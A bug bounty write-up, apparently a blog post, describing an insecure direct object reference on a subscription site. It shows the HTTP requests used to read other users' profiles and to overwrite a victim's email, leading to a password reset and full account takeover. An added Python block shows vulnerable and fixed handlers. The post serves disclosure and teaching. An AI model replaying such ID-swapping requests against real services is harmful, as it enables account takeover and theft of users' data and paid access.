IDOR : A Tale of Account Takeover

Pankaj Verma
Armour Infosec
Aug 6, 2020

Hi Fellow Hackers & Security Enthusiasts, I’m back again with a new bug bounty writeup. Today I am going to write about how I was able to get a free subscription to premium videos on an application through account takeover. The application was vulnerable to Insecure Direct Object References (IDOR), through which I could perform several attacks. On digging further into the endpoints, I was able to perform a full account takeover via the user’s profile information, i.e. email, password, mobile number, etc. Before starting with the attack scenario, let’s see some basics about IDOR.

Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.

So, let’s call the target target.com. I started by testing the user authentication process, as I like to attempt authentication bypass on an application. Unluckily, I had no success there. As the application has a paid subscription, I created a free account, which was later asked to purchase a subscription to access the content. After roaming around the application, I came to the user profile section, which sends a request like this:

GET /user/152453 HTTP/1.1
Host: target.com
Cookies: session=xxxxxxxx

I sent this request to Repeater and replaced the UserID with the victim’s (152157), which was easily guessable due to sequential UserIDs. The response I got back from the application was a gem:

HTTP/1.1 200 OK

{"user":{"id":152157,"email":"victim@test.com","name":"Victim","membership":1,"created_at":"2020-02-17 18:45:01","updated_at":"2020-02-17 18:45:01","status":1,"device_id":null,"mob_id":null,"phone":"1234567890","dob":"1998-10-14","access":1}}

I was able to get any user’s account information, but the fight was not over yet: I needed the user’s password to access those accounts. While updating the user profile, I found the /updateuserprofile endpoint, which takes a request like this:

POST /updateuserprofile/152453 HTTP/1.1
Host: target.com
Cookies: session=xxxxxxxx

{"name":"Attacker","email":"attacker@test.com","phone":"1234567890","dob":"2000-01-01"}

I quickly sent the request to Repeater, replaced the attacker’s UserID (152453) with the victim’s ID (152157), and got the result I wanted:

HTTP/1.1 200 OK

{"status":"User Data Successfully Updated","user":{"id":152157,"email":"attacker@test.com","name":"Attacker","membership":1,"created_at":"2020-02-17 18:45:01","updated_at":"2020-06-28 15:22:49","status":1,"device_id":null,"mob_id":null,"phone":"1234567890","dob":"2000-01-01","access":1}}

I successfully overwrote the victim’s email address and other details with the attacker’s. Then I logged out and requested a new password for the attacker’s email, and yes: I successfully logged in to the paid account and was able to access all the paid content. So that is my way to account takeover of any user on the target application. I also found some other ways to get paid membership for a user, but this one was more interesting and easy.
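The access-control failure above, modelled as an added example that is not code from the original post or from the target application: a read and a write handler that authenticate the caller but never check ownership of the requested object, next to fixed versions that bind the object id to the session identity and stage email changes for re-verification. The in-memory store, session tokens and user records are constructed sample data.

```python
from dataclasses import dataclass, asdict

@dataclass
class User:
    id: int
    email: str
    name: str
    membership: int

# Constructed sample data: two users and the session token of each.
USERS = {
    152453: User(152453, "attacker@test.com", "Attacker", 0),
    152157: User(152157, "victim@test.com", "Victim", 1),
}
SESSIONS = {"sess-attacker": 152453, "sess-victim": 152157}

class Forbidden(Exception):
    pass

def get_user_vulnerable(session: str, user_id: int) -> dict:
    """IDOR: the session proves who the caller is, but the object id from
    the path is trusted as-is, so any logged-in user can read any profile."""
    if session not in SESSIONS:
        raise Forbidden("not authenticated")
    return asdict(USERS[user_id])

def get_user_fixed(session: str, user_id: int) -> dict:
    """Fixed: the requested object must belong to the authenticated caller."""
    caller = SESSIONS.get(session)
    if caller is None or caller != user_id:
        raise Forbidden("not authorized for this object")
    return asdict(USERS[user_id])

def update_profile_fixed(session: str, user_id: int, changes: dict) -> dict:
    """Fixed write path: ownership check, an allowlist of directly writable
    fields, and email changes staged for re-verification instead of applied.
    In a real application the staged email would trigger a confirmation mail
    to the new address before the account's login email is switched."""
    caller = SESSIONS.get(session)
    if caller is None or caller != user_id:
        raise Forbidden("not authorized for this object")
    user = USERS[user_id]
    for key in ("name",):          # fields a user may change without re-auth
        if key in changes:
            setattr(user, key, changes[key])
    pending = {}
    if "email" in changes and changes["email"] != user.email:
        pending["email"] = changes["email"]
    return {"user": asdict(user), "pending_verification": pending}
```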

Takeaways:

  • Mapping the application always plays a big role in crawling endpoints.
  • Always try to increase the impact of the vulnerability.
  • Explanation and practice lab for IDOR: PortSwigger

If you enjoyed reading my article do clap and follow on Medium and Twitter:

Twitter: https://twitter.com/_p4nk4j

LinkedIn: https://www.linkedin.com/in/p4nk4jv/
